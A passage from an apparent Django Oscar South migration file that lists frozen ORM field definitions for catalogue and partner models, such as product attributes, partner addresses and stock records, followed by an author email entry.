'upc': ('oscar.models.fields.NullCharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}) }, u'catalogue.productattribute': { 'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'}, 'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}), 'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}), 'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': u"orm['catalogue.ProductClass']"}), 'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'}) }, u'catalogue.productattributevalue': { 'Meta': {'object_name': 'ProductAttributeValue'}, 'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.ProductAttribute']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': u"orm['catalogue.Product']"}), 'value_boolean': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}), 'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}), 'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}), 'value_file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}), 'value_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}), 'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}) }, u'catalogue.productcategory': { 'Meta': {'ordering': "['product', 'category']", 'object_name': 'ProductCategory'}, 'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Category']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"}) }, u'catalogue.productclass': { 'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}), 'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'slug': ('oscar.models.fields.autoslugfield.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '128', 'separator': "u'-'", 'blank': 'True', 'unique': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), 'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, u'catalogue.productrecommendation': { 'Meta': {'object_name': 'ProductRecommendation'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': u"orm['catalogue.Product']"}), 'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), 'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, u'partner.partner': { 'Meta': {'object_name': 'Partner'}, 'code': ('oscar.models.fields.autoslugfield.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '128', 'separator': "u'-'", 'blank': 'True', 'unique': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'partners'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['{0}']".format(AUTH_USER_MODEL)}) }, u'partner.partneraddress': { 'Meta': {'object_name': 'PartnerAddress'}, 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['address.Country']"}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'line1': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'line2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'line3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'line4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'partner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'to': u"orm['partner.Partner']"}), 'postcode': ('oscar.models.fields.UppercaseCharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}), 'search_text': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}) }, u'partner.stockalert': { 'Meta': {'ordering': "('-date_created',)", 'object_name': 'StockAlert'}, 'date_closed': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '128'}), 'stockrecord': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'alerts'", 'to': u"orm['partner.StockRecord']"}), 'threshold': ('django.db.models.fields.PositiveIntegerField', [], {}) }, u'partner.stockrecord': { 'Meta': {'unique_together': "(('partner', 'partner_sku'),)", 'object_name': 'StockRecord'}, 'cost_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}), 'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'low_stock_threshold': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}), 'num_allocated': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'num_in_stock': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}), 'partner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['partner.Partner']"}), 'partner_sku': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'price_currency': ('django.db.models.fields.CharField', [], {'default': "'GBP'", 'max_length': '12'}), 'price_excl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}), 'price_retail': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['catalogue.Product']"}) } } complete_apps = ['partner'] symmetrical = True
[ "m@maikhoepfel.de" ]
m@maikhoepfel.de